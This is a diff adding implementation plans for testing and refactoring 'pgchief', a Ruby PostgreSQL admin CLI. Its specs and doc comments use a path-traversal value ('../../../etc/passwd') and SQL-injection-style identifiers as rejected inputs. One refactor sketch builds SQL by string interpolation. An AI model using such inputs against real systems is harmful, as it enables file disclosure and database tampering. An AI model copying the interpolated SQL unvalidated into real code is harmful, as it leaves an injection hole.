+- Target coverage: 80%
+- Files needing tests (list from coverage report)
+- Priority order (critical business logic first)
+
+**Step 4: Commit coverage baseline**
+
+```bash
+# Save baseline for comparison
+cp coverage/.last_run.json coverage/baseline.json
+git add coverage/baseline.json
+git commit -m "test: establish coverage baseline for improvement tracking"
+```
+
+---
+
+## Task 2: Add Tests for S3Upload Command
+
+**Files:**
+- Create: `spec/pgchief/command/s3_upload_spec.rb`
+
+**Step 1: Write comprehensive tests**
+
+Create `spec/pgchief/command/s3_upload_spec.rb`:
+
+```ruby
+# frozen_string_literal: true
+
+require 'spec_helper'
+require 'pgchief/command/s3_upload'
+require 'aws-sdk-s3'
+
+RSpec.describe Pgchief::Command::S3Upload do
+  let(:local_file) { '/tmp/test_backup.dump' }
+  let(:s3_key) { 'backups/test_backup.dump' }
+  let(:s3_client) { instance_double(Aws::S3::Client) }
+  let(:s3_resource) { instance_double(Aws::S3::Resource) }
+  let(:s3_bucket) { instance_double(Aws::S3::Bucket) }
+  let(:s3_object) { instance_double(Aws::S3::Object) }
+
+  before do
+    allow(Aws::S3::Resource).to receive(:new).and_return(s3_resource)
+    allow(s3_resource).to receive(:bucket).and_return(s3_bucket)
+    allow(s3_bucket).to receive(:object).and_return(s3_object)
+
+    # Create temp file for testing
+    File.write(local_file, 'test backup data')
+  end
+
+  after do
+    File.delete(local_file) if File.exist?(local_file)
+  end
+
+  describe '#upload!' do
+    it 'uploads file to S3' do
+      expect(s3_object).to receive(:upload_file).with(local_file)
+
+      command = described_class.new(local_file: local_file, s3_key: s3_key)
+      command.upload!
+    end
+
+    it 'raises error when local file does not exist' do
+      expect do
+        described_class.new(local_file: '/nonexistent/file', s3_key: s3_key).upload!
+      end.to raise_error(Pgchief::BackupError, /File not found/)
+    end
+
+    it 'raises error when S3 upload fails' do
+      allow(s3_object).to receive(:upload_file).and_raise(Aws::S3::Errors::ServiceError.new(nil, 'upload failed'))
+
+      command = described_class.new(local_file: local_file, s3_key: s3_key)
+      expect { command.upload! }.to raise_error(Pgchief::BackupError, /S3 upload failed/)
+    end
+
+    it 'validates S3 key format' do
+      expect do
+        described_class.new(local_file: local_file, s3_key: '../../../etc/passwd')
+      end.to raise_error(Pgchief::ValidationError)
+    end
+  end
+end
+```
+
+**Step 2: Run tests to see failures**
+
+Run: `bundle exec rspec spec/pgchief/command/s3_upload_spec.rb`
+Expected: Tests may fail if s3_upload doesn't have proper error handling
+
+**Step 3: Update S3Upload to match test expectations**
+
+Modify `lib/pgchief/command/s3_upload.rb` to add error handling, validation, etc.
+
+**Step 4: Run tests until they pass**
+
+Run: `bundle exec rspec spec/pgchief/command/s3_upload_spec.rb`
+Expected: All tests PASS
+
+**Step 5: Commit**
+
+```bash
+git add spec/pgchief/command/s3_upload_spec.rb lib/pgchief/command/s3_upload.rb
+git commit -m "test: add comprehensive tests for S3Upload command
+
+- Test successful upload
+- Test error cases (missing file, S3 failures)
+- Test input validation
+- Mock S3 client to avoid real AWS calls"
+```
+
+---
+
+## Task 3: Add Tests for Prompt Classes
+
+**Files:**
+- Create: `spec/pgchief/prompt/start_spec.rb`
+- Create: `spec/pgchief/prompt/database_management_spec.rb`
+- Create: `spec/pgchief/prompt/user_management_spec.rb`
+
+**Step 1: Write tests for Start prompt**
+
+Create `spec/pgchief/prompt/start_spec.rb`:
+
+```ruby
+# frozen_string_literal: true
+
+require 'spec_helper'
+require 'pgchief/prompt/start'
+
+RSpec.describe Pgchief::Prompt::Start do
+  let(:prompt) { instance_double(TTY::Prompt) }
+  let(:start_prompt) { described_class.new(prompt: prompt) }
+
+  describe '#start!' do
+    it 'presents main menu options' do
+      expect(prompt).to receive(:select).with(
+        'What would you like to do?',
+        anything
+      ).and_return('Database Management')
+
+      # Mock subsequent prompt
+      allow_any_instance_of(Pgchief::Prompt::DatabaseManagement).to receive(:start!)
+
+      start_prompt.start!
+    end
+
+    it 'navigates to Database Management' do
+      allow(prompt).to receive(:select).and_return('Database Management')
+
+      db_management = instance_double(Pgchief::Prompt::DatabaseManagement)
+      expect(Pgchief::Prompt::DatabaseManagement).to receive(:new).and_return(db_management)
+      expect(db_management).to receive(:start!)
+
+      start_prompt.start!
+    end
+
+    it 'navigates to User Management' do
+      allow(prompt).to receive(:select).and_return('User Management')
+
+      user_management = instance_double(Pgchief::Prompt::UserManagement)
+      expect(Pgchief::Prompt::UserManagement).to receive(:new).and_return(user_management)
+      expect(user_management).to receive(:start!)
+
+      start_prompt.start!
+    end
+
+    it 'exits when user selects exit' do
+      allow(prompt).to receive(:select).and_return('Exit')
+
+      expect { start_prompt.start! }.to raise_error(SystemExit)
+    end
+  end
+end
+```
+
+**Step 2: Write tests for DatabaseManagement prompt**
+
+Create `spec/pgchief/prompt/database_management_spec.rb`:
+
+```ruby
+# frozen_string_literal: true
+
+require 'spec_helper'
+require 'pgchief/prompt/database_management'
+
+RSpec.describe Pgchief::Prompt::DatabaseManagement do
+  let(:prompt) { instance_double(TTY::Prompt) }
+  let(:db_prompt) { described_class.new(prompt: prompt) }
+
+  describe '#start!' do
+    it 'presents database management options' do
+      expect(prompt).to receive(:select).with(
+        'Database Management',
+        anything
+      ).and_return('Back')
+
+      db_prompt.start!
+    end
+
+    it 'creates database when selected' do
+      allow(prompt).to receive(:select).and_return('Create Database')
+      allow(prompt).to receive(:ask).and_return('testdb')
+
+      create_command = instance_double(Pgchief::Command::DatabaseCreate)
+      expect(Pgchief::Command::DatabaseCreate).to receive(:new)
+        .with(database: 'testdb')
+        .and_return(create_command)
+      expect(create_command).to receive(:create_db!)
+
+      # Mock return to menu
+      allow(prompt).to receive(:select).and_return('Back')
+
+      db_prompt.start!
+    end
+
+    it 'drops database when selected' do
+      allow(prompt).to receive(:select).and_return('Drop Database', 'Back')
+      allow(prompt).to receive(:ask).and_return('testdb')
+
+      drop_command = instance_double(Pgchief::Command::DatabaseDrop)
+      expect(Pgchief::Command::DatabaseDrop).to receive(:new)
+        .with(database: 'testdb')
+        .and_return(drop_command)
+      expect(drop_command).to receive(:drop_db!)
+
+      db_prompt.start!
+    end
+  end
+end
+```
+
+**Step 3: Run prompt tests**
+
+Run: `bundle exec rspec spec/pgchief/prompt/ -v`
+Expected: Tests pass with mocked TTY::Prompt
+
+**Step 4: Commit**
+
+```bash
+git add spec/pgchief/prompt/
+git commit -m "test: add tests for prompt classes
+
+- Test Start prompt navigation
+- Test DatabaseManagement prompt options
+- Test UserManagement prompt options
+- Mock TTY::Prompt to avoid interactive input"
+```
+
+---
+
+## Task 4: Add Error Path Coverage
+
+**Files:**
+- Modify: All command spec files to add error cases
+
+**Step 1: Add error tests to DatabaseCreate**
+
+Modify `spec/pgchief/command/database_create_spec.rb`:
+
+```ruby
+# Add these tests
+
+describe 'error handling' do
+  it 'raises ConnectionError when cannot connect' do
+    allow(PG).to receive(:connect).and_raise(PG::ConnectionBad, 'connection refused')
+
+    expect { described_class.new(database: 'test') }
+      .to raise_error(Pgchief::ConnectionError, /Failed to connect/)
+  end
+
+  it 'raises DatabaseError when database already exists' do
+    allow_any_instance_of(PG::Connection).to receive(:exec)
+      .and_raise(PG::DuplicateDatabase, 'database "test" already exists')
+
+    expect { described_class.new(database: 'test').create_db! }
+      .to raise_error(Pgchief::DatabaseError)
+  end
+
+  it 'raises PermissionError when insufficient privileges' do
+    allow_any_instance_of(PG::Connection).to receive(:exec)
+      .and_raise(PG::InsufficientPrivilege, 'permission denied')
+
+    expect { described_class.new(database: 'test').create_db! }
+      .to raise_error(Pgchief::PermissionError)
+  end
+
+  it 'closes connection even when error occurs' do
+    conn = instance_double(PG::Connection)
+    allow(PG).to receive(:connect).and_return(conn)
+    allow(conn).to receive(:exec).and_raise(PG::Error)
+    expect(conn).to receive(:close)
+
+    expect { described_class.new(database: 'test').create_db! }
+      .to raise_error(Pgchief::DatabaseError)
+  end
+end
+```
+
+**Step 2: Add error tests to all command classes**
+
+Repeat similar error testing patterns for:
+- DatabaseDrop
+- UserCreate
+- UserDrop
+- DatabaseBackup
+- DatabaseRestore
+- DatabasePrivilegesGrant
+- DatabasePrivilegesRevoke
+
+**Step 3: Run tests**
+
+Run: `COVERAGE=true bundle exec rspec spec/pgchief/command/`
+Expected: Coverage improves for command classes
+
+**Step 4: Commit**
+
+```bash
+git add spec/pgchief/command/
+git commit -m "test: add error path coverage for all commands
+
+- Test connection failures
+- Test permission errors
+- Test resource conflicts (duplicate database, etc.)
+- Test connection cleanup in error scenarios
+- Increase command coverage to 80%+"
+```
+
+---
+
+## Task 5: Add Mock-Based Unit Tests
+
+**Files:**
+- Create: `spec/support/pg_connection_helper.rb`
+
+**Step 1: Create mock helper**
+
+Create `spec/support/pg_connection_helper.rb`:
+
+```ruby
+# frozen_string_literal: true
+
+module PgConnectionHelper
+  def mock_pg_connection
+    instance_double(PG::Connection).tap do |conn|
+      allow(conn).to receive(:exec).and_return(true)
+      allow(conn).to receive(:exec_params).and_return(true)
+      allow(conn).to receive(:close)
+      allow(conn).to receive(:finished?).and_return(false)
+    end
+  end
+
+  def stub_pg_connect(connection = mock_pg_connection)
+    allow(PG).to receive(:connect).and_return(connection)
+    connection
+  end
+end
+
+RSpec.configure do |config|
+  config.include PgConnectionHelper
+end
+```
+
+**Step 2: Refactor existing tests to use mocks**
+
+Update existing command tests to use mocks instead of real DB connections:
+
+```ruby
+# Before:
+describe Pgchief::Command::DatabaseCreate do
+  it 'creates a database' do
+    command = described_class.new(database: 'testdb')
+    # Uses real database connection
+  end
+end
+
+# After:
+describe Pgchief::Command::DatabaseCreate do
+  it 'creates a database' do
+    conn = stub_pg_connect
+    expect(conn).to receive(:exec).with('CREATE DATABASE testdb')
+    expect(conn).to receive(:exec).with('REVOKE CONNECT ON DATABASE testdb FROM PUBLIC')
+
+    command = described_class.new(database: 'testdb')
+    command.create_db!
+  end
+end
+```
+
+**Step 3: Tag integration tests separately**
+
+Add `:integration` tag to tests that actually connect to database:
+
+```ruby
+RSpec.describe 'Database Operations', :integration do
+  # Real database tests
+end
+```
+
+**Step 4: Update spec_helper to skip integration tests by default**
+
+Modify `spec/spec_helper.rb`:
+
+```ruby
+RSpec.configure do |config|
+  # Skip integration tests by default (run with --tag integration)
+  config.filter_run_excluding :integration unless ENV['INTEGRATION']
+end
+```
+
+**Step 5: Run unit tests only**
+
+Run: `bundle exec rspec --tag ~integration`
+Expected: Fast unit tests with mocks, no database required
+
+**Step 6: Commit**
+
+```bash
+git add spec/support/pg_connection_helper.rb spec/spec_helper.rb spec/pgchief/command/
+git commit -m "test: add mock-based unit tests
+
+- Create PG connection mock helper
+- Refactor tests to use mocks for unit testing
+- Tag integration tests separately
+- Unit tests run without database connection
+- Improves test speed and isolation"
+```
+
+---
+
+## Task 6: Add Edge Case Coverage
+
+**Files:**
+- Create: `spec/pgchief/edge_cases_spec.rb`
+
+**Step 1: Write edge case tests**
+
+Create `spec/pgchief/edge_cases_spec.rb`:
+
+```ruby
+# frozen_string_literal: true
+
+require 'spec_helper'
+
+RSpec.describe 'Edge Cases' do
+  describe 'identifier validation edge cases' do
+    it 'handles empty strings' do
+      expect(Pgchief::Validators.valid_identifier?('')).to be false
+    end
+
+    it 'handles nil values' do
+      expect(Pgchief::Validators.valid_identifier?(nil)).to be false
+    end
+
+    it 'handles whitespace-only strings' do
+      expect(Pgchief::Validators.valid_identifier?('   ')).to be false
+    end
+
+    it 'handles identifiers exactly at length limit' do
+      exactly_63 = 'a' * 63
+      expect(Pgchief::Validators.valid_identifier?(exactly_63)).to be true
+    end
+
+    it 'handles identifiers just over length limit' do
+      sixty_four = 'a' * 64
+      expect(Pgchief::Validators.valid_identifier?(sixty_four)).to be false
+    end
+
+    it 'handles identifiers starting with underscore' do
+      expect(Pgchief::Validators.valid_identifier?('_test')).to be true
+    end
+
+    it 'handles identifiers starting with number' do
+      expect(Pgchief::Validators.valid_identifier?('1test')).to be false
+    end
+  end
+
+  describe 'connection string parsing edge cases' do
+    it 'handles URLs with no password' do
+      cs = Pgchief::ConnectionString.new('postgresql://user@localhost/db')
+      expect(cs.user).to eq('user')
+      expect(cs.password).to be_nil
+    end
+
+    it 'handles URLs with no user' do
+      cs = Pgchief::ConnectionString.new('postgresql://localhost/db')
+      expect(cs.user).to be_nil
+    end
+
+    it 'handles URLs with port numbers' do
+      cs = Pgchief::ConnectionString.new('postgresql://localhost:5433/db')
+      expect(cs.port).to eq(5433)
+    end
+
+    it 'handles URLs with URL-encoded passwords' do
+      cs = Pgchief::ConnectionString.new('postgresql://user:p%40ssword@localhost/db')
+      expect(cs.password).to include('@')
+    end
+  end
+
+  describe 'file path edge cases' do
+    it 'handles paths with spaces' do
+      expect(Pgchief::Validators.valid_file_path?('/tmp/my backup.dump')).to be true
+    end
+
+    it 'handles relative paths' do
+      expect(Pgchief::Validators.valid_file_path?('backup.dump')).to be true
+    end
+
+    it 'handles home directory expansion' do
+      path = '~/backups/db.dump'
+      sanitized = Pgchief::Validators.sanitize_file_path(path)
+      expect(sanitized).not_to include('~')
+    end
+  end
+
+  describe 'configuration edge cases' do
+    it 'handles missing config file gracefully' do
+      allow(File).to receive(:exist?).and_return(false)
+      expect { Pgchief::Config.load_config! }.not_to raise_error
+    end
+
+    it 'handles malformed TOML config' do
+      allow(File).to receive(:exist?).and_return(true)
+      allow(File).to receive(:read).and_return('invalid toml {{{{')
+      expect { Pgchief::Config.load_config! }.not_to raise_error
+    end
+  end
+end
+```
+
+**Step 2: Run edge case tests**
+
+Run: `bundle exec rspec spec/pgchief/edge_cases_spec.rb`
+Expected: Some tests may fail, revealing edge case bugs
+
+**Step 3: Fix edge cases found**
+
+Update code to handle edge cases properly.
+
+**Step 4: Commit**
+
+```bash
+git add spec/pgchief/edge_cases_spec.rb
+git commit -m "test: add edge case coverage
+
+- Test empty/nil identifier handling
+- Test length boundary conditions
+- Test connection string parsing edge cases
+- Test file path special characters
+- Test configuration error handling"
+```
+
+---
+
+## Task 7: Check Coverage and Fill Gaps
+
+**Step 1: Run full test suite with coverage**
+
+Run: `COVERAGE=true bundle exec rspec`
+
+**Step 2: Review coverage report**
+
+Run: `open coverage/index.html`
+
+Identify any files still below 70% coverage.
+
+**Step 3: Add tests for gaps**
+
+For each uncovered file/class:
+1. Write tests for uncovered lines
+2. Run tests
+3. Verify coverage improves
+4. Commit
+
+**Step 4: Repeat until 80%+ coverage**
+
+Continue adding tests until:
+- Overall coverage >= 80%
+- No individual file < 70% (except vendored code)
+
+---
+
+## Verification Checklist
+
+- [ ] Coverage report generated
+- [ ] S3Upload has comprehensive tests
+- [ ] All prompt classes have tests
+- [ ] Error paths tested for all commands
+- [ ] Mock-based unit tests for fast execution
+- [ ] Integration tests tagged separately
+- [ ] Edge cases covered
+- [ ] Overall coverage >= 80%
+- [ ] No critical files < 70% coverage
+- [ ] All tests passing
+
+## Notes
+
+- Target is 80% overall, 70% minimum per file
+- Use mocks for unit tests (fast, no DB required)
+- Use integration tests for end-to-end verification
+- Edge cases often reveal bugs - fix them!
+- Focus on critical business logic first

--- a/docs/plans/2026-01-30-week6-code-quality-refactoring.md
+++ b/docs/plans/2026-01-30-week6-code-quality-refactoring.md
@@ -1,0 +1,846 @@
+# Week 6: Refactor Code Quality Issues Implementation Plan
+
+> **For Claude:** REQUIRED SUB-SKILL: Use superpowers:executing-plans to implement this plan task-by-task.
+
+**Goal:** Resolve all code smells, refactor large methods, extract magic strings to constants, improve consistency across the codebase, and ensure RuboCop compliance.
+
+**Architecture:** Extract constants for magic values, refactor large methods into smaller focused methods, standardize patterns across similar classes, implement connection management abstraction, improve configuration handling.
+
+**Tech Stack:** Ruby 3.0+, RuboCop
+
+---
+
+## Task 1: Extract Magic Strings to Constants
+
+**Files:**
+- Create: `lib/pgchief/constants.rb`
+- Modify: All command and prompt files using magic strings
+
+**Step 1: Write failing tests**
+
+Create `spec/pgchief/constants_spec.rb`:
+
+```ruby
+# frozen_string_literal: true
+
+require 'spec_helper'
+require 'pgchief/constants'
+
+RSpec.describe Pgchief::Constants do
+  describe 'DEFAULT_DATABASES' do
+    it 'includes system databases' do
+      expect(described_class::DEFAULT_DATABASES).to include('postgres', 'template0', 'template1')
+    end
+  end
+
+  describe 'MAX_IDENTIFIER_LENGTH' do
+    it 'matches PostgreSQL limit' do
+      expect(described_class::MAX_IDENTIFIER_LENGTH).to eq(63)
+    end
+  end
+
+  describe 'DEFAULT_PORT' do
+    it 'matches PostgreSQL default' do
+      expect(described_class::DEFAULT_PORT).to eq(5432)
+    end
+  end
+end
+```
+
+**Step 2: Create constants module**
+
+Create `lib/pgchief/constants.rb`:
+
+```ruby
+# frozen_string_literal: true
+
+module Pgchief
+  # Application-wide constants
+  module Constants
+    # PostgreSQL system databases
+    DEFAULT_DATABASES = %w[postgres template0 template1].freeze
+
+    # PostgreSQL identifier constraints
+    MAX_IDENTIFIER_LENGTH = 63
+    IDENTIFIER_REGEX = /\A[a-z_][a-z0-9_]*\z/i
+
+    # Password constraints
+    MAX_PASSWORD_LENGTH = 100
+
+    # Connection defaults
+    DEFAULT_PORT = 5432
+
+    # File paths
+    DEFAULT_CONFIG_DIR = File.join(Dir.home, '.pgchief').freeze
+    CONFIG_FILE_NAME = 'pgchief.toml'
+    CREDENTIALS_FILE = 'credentials.enc'
+    CREDENTIALS_KEY_FILE = '.credentials.key'
+
+    # Backup defaults
+    DEFAULT_BACKUP_DIR = File.join(Dir.home, 'pgchief_backups').freeze
+
+    # Retry configuration
+    DEFAULT_MAX_RETRY_ATTEMPTS = 4
+    DEFAULT_RETRY_BASE_DELAY = 0.5
+    DEFAULT_RETRY_MAX_DELAY = 10
+
+    # Log levels
+    LOG_LEVELS = %w[DEBUG INFO WARN ERROR FATAL].freeze
+    DEFAULT_LOG_LEVEL = 'INFO'
+  end
+end
+```
+
+**Step 3: Update Validators to use constants**
+
+Modify `lib/pgchief/validators.rb`:
+
+```ruby
+# Replace hardcoded values with constants
+IDENTIFIER_REGEX = Constants::IDENTIFIER_REGEX
+MAX_IDENTIFIER_LENGTH = Constants::MAX_IDENTIFIER_LENGTH
+PASSWORD_MAX_LENGTH = Constants::MAX_PASSWORD_LENGTH
+```
+
+**Step 4: Update all files using magic strings**
+
+Search and replace magic values across codebase:
+- `'postgres'` → `Constants::DEFAULT_DATABASES[0]`
+- `'template0'` → `Constants::DEFAULT_DATABASES[1]`
+- `'template1'` → `Constants::DEFAULT_DATABASES[2]`
+- `63` → `Constants::MAX_IDENTIFIER_LENGTH`
+- `5432` → `Constants::DEFAULT_PORT`
+
+**Step 5: Run tests**
+
+Run: `bundle exec rspec spec/pgchief/constants_spec.rb`
+Expected: All tests PASS
+
+**Step 6: Commit**
+
+```bash
+git add lib/pgchief/constants.rb spec/pgchief/constants_spec.rb lib/pgchief/validators.rb lib/pgchief/*.rb lib/pgchief/command/*.rb
+git commit -m "refactor: extract magic strings to constants
+
+- Create Constants module with all magic values
+- Replace hardcoded strings across codebase
+- Improve maintainability and discoverability
+- Document PostgreSQL constraints"
+```
+
+---
+
+## Task 2: Refactor Large Methods
+
+**Files:**
+- Modify: `lib/pgchief/config.rb`
+- Modify: `lib/pgchief/cli.rb`
+- Modify: `lib/pgchief/command/database_privileges_grant.rb`
+
+**Step 1: Refactor Config.load_config!**
+
+Current `Config.load_config!` is 19 lines with multiple responsibilities.
+
+Modify `lib/pgchief/config.rb`:
+
+```ruby
+# Before: one large method
+def self.load_config!
+  # 19 lines of config loading, env checking, error handling
+end
+
+# After: extracted methods
+def self.load_config!
+  config_data = load_config_file
+  merge_environment_variables!(config_data)
+  validate_config!(config_data)
+  @config = config_data
+rescue StandardError => e
+  Pgchief::Logger.error("Failed to load config", e)
+  raise ConfigurationError, "Config loading failed: #{e.message}"
+end
+
+private
+
+def self.load_config_file
+  return {} unless File.exist?(config_file_path)
+
+  toml_content = File.read(config_file_path)
+  TomlRB.parse(toml_content)
+rescue TomlRB::ParseError => e
+  Pgchief::Logger.warn("Invalid TOML config: #{e.message}")
+  {}
+end
+
+def self.merge_environment_variables!(config)
+  config['pgurl'] = ENV['PGURL'] if ENV['PGURL']
+  config['s3_bucket'] = ENV['S3_BUCKET'] if ENV['S3_BUCKET']
+  config['backup_dir'] = ENV['BACKUP_DIR'] if ENV['BACKUP_DIR']
+end
+
+def self.validate_config!(config)
+  if config['pgurl'].nil? || config['pgurl'].empty?
+    raise ConfigurationError, "PGURL not configured. Set PGURL environment variable or add to #{config_file_path}"
+  end
+end
+
+def self.config_file_path
+  @config_file_path ||= File.join(Constants::DEFAULT_CONFIG_DIR, Constants::CONFIG_FILE_NAME)
+end
+```
+
+**Step 2: Refactor Cli.run method**
+
+Current `Cli.run` has disabled RuboCop for method length and ABC complexity.
+
+Modify `lib/pgchief/cli.rb`:
+
+```ruby
+def self.run
+  params = parse_options
+  handle_command(params)
+rescue StandardError => e
+  Pgchief::Logger.error("CLI error", e)
+  exit 1
+end
+
+private
+
+def self.handle_command(params)
+  case
+  when params[:version]
+    puts Pgchief::VERSION
+  when params[:database_create]
+    handle_database_create(params)
+  when params[:database_drop]
+    handle_database_drop(params)
+  when params[:user_create]
+    handle_user_create(params)
+  when params[:interactive]
+    Pgchief::Prompt::Start.new.start!
+  else
+    puts params.help
+  end
+end
+
+def self.handle_database_create(params)
+  Pgchief::Command::DatabaseCreate.new(database: params[:database]).create_db!
+end
+
+def self.handle_database_drop(params)
+  Pgchief::Command::DatabaseDrop.new(database: params[:database]).drop_db!
+end
+
+# ... extract each command handler
+```
+
+**Step 3: Run RuboCop**
+
+Run: `bundle exec rubocop lib/pgchief/config.rb lib/pgchief/cli.rb`
+Expected: No more disabled cops for method length
+
+**Step 4: Commit**
+
+```bash
+git add lib/pgchief/config.rb lib/pgchief/cli.rb
+git commit -m "refactor: extract large methods into smaller focused methods
+
+- Break Config.load_config! into 4 focused methods
+- Extract Cli command handlers
+- Remove RuboCop disables for method length
+- Improve readability and testability"
+```
+
+---
+
+## Task 3: Standardize Connection Management
+
+**Files:**
+- Create: `lib/pgchief/database_connection.rb`
+- Modify: `lib/pgchief/command/base.rb`
+- Modify: All command classes
+
+**Step 1: Create DatabaseConnection abstraction**
+
+Create `lib/pgchief/database_connection.rb`:
+
+```ruby
+# frozen_string_literal: true
+
+require 'pg'
+
+module Pgchief
+  # Database connection management with retry logic
+  class DatabaseConnection
+    include Retryable
+
+    attr_reader :connection
+
+    def initialize(database: nil)
+      @database = database
+      @connection = establish_connection
+    end
+
+    def execute(sql, params = [])
+      if params.empty?
+        connection.exec(sql)
+      else
+        connection.exec_params(sql, params)
+      end
+    end
+
+    def close
+      return if connection.nil? || connection.finished?
+      connection.close
+    end
+
+    def closed?
+      connection.nil? || connection.finished?
+    end
+
+    private
+
+    def establish_connection
+      url = connection_url
+      with_retry do
+        PG.connect(url)
+      end
+    rescue PG::Error => e
+      raise ConnectionError.new("Failed to connect to #{url}", e)
+    end
+
+    def connection_url
+      base_url = Pgchief::Config.pgurl
+      @database ? "#{base_url}/#{@database}" : base_url
+    end
+  end
+end
+```
+
+**Step 2: Update Base to use DatabaseConnection**
+
+Modify `lib/pgchief/command/base.rb`:
+
+```ruby
+module Pgchief
+  module Command
+    class Base
+      attr_reader :db
+
+      def initialize(database: nil)
+        @db = DatabaseConnection.new(database: database)
+      end
+
+      # Legacy support
+      def conn
+        @db.connection
+      end
+
+      private
+
+      def execute(sql, params = [])
+        db.execute(sql, params)
+      end
+
+      def close_connection
+        db.close
+      end
+    end
+  end
+end
+```
+
+**Step 3: Update commands to use execute helper**
+
+Modify commands to use `execute` instead of `conn.exec`:
+
+```ruby
+# Before:
+conn.exec("CREATE DATABASE #{@database}")
+
+# After:
+execute("CREATE DATABASE #{@database}")
+```
+
+**Step 4: Commit**
+
+```bash
+git add lib/pgchief/database_connection.rb lib/pgchief/command/base.rb lib/pgchief/command/*.rb
+git commit -m "refactor: create DatabaseConnection abstraction
+
+- Centralize connection management
+- Include retry logic by default
+- Standardize execute patterns
+- Improve connection lifecycle management"
+```
+
+---
+
+## Task 4: Fix TTY::Prompt Instantiation Inconsistency
+
+**Files:**
+- Modify: `lib/pgchief/prompt/base.rb`
+- Modify: `lib/pgchief/prompt/database_management.rb`
+- Modify: All other prompt files
+
+**Step 1: Ensure all prompts use inherited prompt**
+
+Modify `lib/pgchief/prompt/database_management.rb`:
+
+```ruby
+# Before:
+def initialize
+  @prompt = TTY::Prompt.new  # Creates its own instance
+end
+
+# After:
+def initialize(prompt: nil)
+  super(prompt: prompt)  # Use parent's prompt
+end
+
+# Remove line that creates new TTY::Prompt.new
+```
+
+**Step 2: Update all prompt classes similarly**
+
+Ensure all prompt classes:
+- Accept `prompt:` parameter
+- Call `super(prompt: prompt)`
+- Use `@prompt` from base class
+- Don't create their own `TTY::Prompt.new`
+
+**Step 3: Run prompt tests**
+
+Run: `bundle exec rspec spec/pgchief/prompt/`
+Expected: All tests PASS
+
+**Step 4: Commit**
+
+```bash
+git add lib/pgchief/prompt/
+git commit -m "refactor: standardize TTY::Prompt usage across prompts
+
+- All prompts use inherited @prompt instance
+- Remove duplicate TTY::Prompt.new calls
+- Consistent initialization pattern"
+```
+
+---
+
+## Task 5: Improve Configuration Consistency
+
+**Files:**
+- Modify: `lib/pgchief/config.rb`
+
+**Step 1: Make Config thread-safe**
+
+Modify `lib/pgchief/config.rb`:
+
+```ruby
+module Pgchief
+  class Config
+    class << self
+      attr_reader :config
+      private :config
+
+      def load_config!
+        @mutex ||= Mutex.new
+        @mutex.synchronize do
+          config_data = load_config_file
+          merge_environment_variables!(config_data)
+          validate_config!(config_data)
+          @config = config_data
+        end
+      rescue StandardError => e
+        Pgchief::Logger.error("Failed to load config", e)
+        raise ConfigurationError, "Config loading failed: #{e.message}"
+      end
+
+      def pgurl
+        ensure_config_loaded
+        config.fetch('pgurl')
+      end
+
+      def s3_bucket
+        ensure_config_loaded
+        config.fetch('s3_bucket', nil)
+      end
+
+      def backup_dir
+        ensure_config_loaded
+        dir = config.fetch('backup_dir', Constants::DEFAULT_BACKUP_DIR)
+        File.expand_path(dir)
+      end
+
+      private
+
+      def ensure_config_loaded
+        load_config! if config.nil?
+      end
+
+      # ... other methods
+    end
+  end
+end
+```
+
+**Step 2: Add tests for thread safety**
+
+Create `spec/pgchief/config_thread_safety_spec.rb`:
+
+```ruby
+# frozen_string_literal: true
+
+require 'spec_helper'
+require 'pgchief/config'
+
+RSpec.describe Pgchief::Config, 'thread safety' do
+  it 'handles concurrent config access safely' do
+    threads = 10.times.map do
+      Thread.new { described_class.pgurl }
+    end
+
+    expect { threads.each(&:join) }.not_to raise_error
+  end
+end
+```
+
+**Step 3: Commit**
+
+```bash
+git add lib/pgchief/config.rb spec/pgchief/config_thread_safety_spec.rb
+git commit -m "refactor: make Config thread-safe
+
+- Add mutex for configuration loading
+- Ensure config loaded before access
+- Add thread safety tests"
+```
+
+---
+
+## Task 6: Clean Up RuboCop Offenses
+
+**Step 1: Run RuboCop to find all offenses**
+
+Run: `bundle exec rubocop`
+
+Review output and categorize offenses:
+- Auto-correctable (use `-A`)
+- Manual fixes needed
+- Legitimate exceptions to disable
+
+**Step 2: Auto-correct safe offenses**
+
+Run: `bundle exec rubocop -A`
+Expected: Many offenses auto-fixed
+
+**Step 3: Manually fix remaining offenses**
+
+For each remaining offense:
+1. Understand the issue
+2. Fix the code
+3. Run RuboCop again
+4. Commit fix
+
+**Step 4: Document accepted exceptions**
+
+For legitimate RuboCop exceptions, add comments:
+
+```ruby
+# rubocop:disable Metrics/MethodLength - Complex SQL query generation requires length
+def build_grant_queries
+  # ...
+end
+# rubocop:enable Metrics/MethodLength
+```
+
+**Step 5: Commit**
+
+```bash
+git add -A
+git commit -m "style: fix all RuboCop offenses
+
+- Auto-correct safe style violations
+- Manually fix remaining issues
+- Document legitimate exceptions
+- Achieve RuboCop compliance"
+```
+
+---
+
+## Task 7: Add Code Documentation (YARD)
+
+**Files:**
+- Modify: All public classes and methods
+
+**Step 1: Add YARD dependency**
+
+Modify `Gemfile`:
+
+```ruby
+group :development do
+  gem 'yard', '~> 0.9'
+end
+```
+
+Run: `bundle install`
+
+**Step 2: Add YARD documentation to key classes**
+
+Example for `lib/pgchief/validators.rb`:
+
+```ruby
+module Pgchief
+  # Input validation utilities for preventing injection attacks
+  module Validators
+    # Validates PostgreSQL identifiers (database names, usernames, etc.)
+    #
+    # PostgreSQL identifiers must:
+    # - Start with a letter or underscore
+    # - Contain only letters, numbers, and underscores
+    # - Be maximum 63 bytes in length
+    #
+    # @param identifier [String] the identifier to validate
+    # @return [Boolean] true if valid, false otherwise
+    #
+    # @example Valid identifiers
+    #   Validators.valid_identifier?('my_database') #=> true
+    #   Validators.valid_identifier?('test123') #=> true
+    #
+    # @example Invalid identifiers
+    #   Validators.valid_identifier?('my-database') #=> false
+    #   Validators.valid_identifier?("test'; DROP") #=> false
+    def self.valid_identifier?(identifier)
+      # ...
+    end
+
+    # Validates and sanitizes an identifier, raising an error if invalid
+    #
+    # @param identifier [String] the identifier to sanitize
+    # @return [String] the validated identifier
+    # @raise [ValidationError] if identifier is invalid
+    #
+    # @example
+    #   Validators.sanitize_identifier('my_db') #=> 'my_db'
+    #   Validators.sanitize_identifier('bad;name') #=> raises ValidationError
+    def self.sanitize_identifier(identifier)
+      # ...
+    end
+  end
+end
+```
+
+**Step 3: Generate YARD documentation**
+
+Run: `bundle exec yard doc`
+Expected: Documentation generated in `doc/` directory
+
+**Step 4: Add .yardopts for configuration**
+
+Create `.yardopts`:
+
+```
+--markup markdown
+--protected
+--private
+--title "pgchief Documentation"
+--readme README.md
+lib/**/*.rb
+```
+
+**Step 5: Add doc/ to .gitignore**
+
+Modify `.gitignore`:
+
+```
+doc/
+.yardoc/
+```
+
+**Step 6: Commit**
+
